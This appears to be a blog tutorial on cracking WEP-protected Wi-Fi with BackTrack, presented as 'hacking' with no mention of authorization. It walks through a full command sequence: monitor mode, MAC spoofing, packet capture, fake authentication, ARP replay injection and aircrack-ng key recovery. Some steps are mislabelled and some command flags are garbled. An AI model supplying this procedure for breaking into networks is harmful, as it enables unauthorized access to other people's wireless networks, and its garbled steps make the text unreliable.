Wi-Fi Hacking : Hack WEP Security using BackTrack

Today i will teach you how you can hack Wi-Fi using Backtrack..To do tjis you must understand Wi-Fi security first...Generally they are many types of Wi-Fi security like

WEP(wired equivalent privacy)
WPA(Wi-Fi protected access)

WPA-TKIP (Wi-Fi Protected Access - Temporary Key Integrity Protocol)
WPA-AES (Wi-Fi Protected Access - Advance Encryption Standard)
WPA-PSK (Wi-Fi Protected Access - Pre Shared Key)


Here I am going to show you how to hack WEP Security using BackTrack. To do so , follow the simple steps ;

Step - 1 : Download BackTrack from Here.

Step - 2 : Boot your computer with BackTrack. For more information about BackTrack visit This

Step - 3 : When you finish the installation process, click on "Konsole" window at the top.

Step - 4 : type the following command ;
airmon-ng

It will show you the interfaces available in your system.

                                     

Note down the interface name. In this, it is wifi0.

Step - 5 : To stop moniter mode, type

                                                      airmon-ng stop wifi0

Step - 6 : To detect the IP address, type

                                                        ifconfig wifi0 down

Step - 7 : Now you have to change your MAC address by typing following command

                                     

                                                        macchanger --mac 00:11:22:33:44:66 wifi0

                                                    

 Step - 8 : To enable monitor mode, type

                                                           airmon-ng start wifi0

                                

                                             

                     

Step - 9 : to see available access points, type

                                           

                                                     airodump-ng wifi0

                                        

This will start populating Wifi networks. Press CTRL + C to stop.

Check the network with WEP encryption.

Note down BSSID, CH anf ESSID.

Step - 10 : To start monitoring of a perticular Wireless Access Point, type,

airodump-ng -c(channel) -w(file name) -bssid(bssid) wifi0

Here, (channel) is your CH which you have noted down

(file name) is any of your choice

(bssid) is BSSID which you have also noted down

                               

Now leave this console and start a new console.

Step - 11 : To deauthenticate and authenticate ourself, type

aireplay-ng -1 - -a(bssid) -h 00:11:22:33:44:66 wifi0

                                                 

If you don't get Association Sucessful message than keep on trying until you get success.

Step - 12 : To attack on ther access point, type

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0

                            

If you don't see ARP ACK and sent packets are not increasing or still 0 than it means no 1 is accessing that network. But do not worry you got an optional step.

Step - 13 : Start new console and type

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:66 wifi0

                                   

Step - 14 : Now type

aircrack-ng -b (bssid) (file name)-01.cap

just wait...BackTrack will do rest of work

                                    

And you got the key. Just remove ":" sign. So the key is 7D0005F98DC9E489F211C54998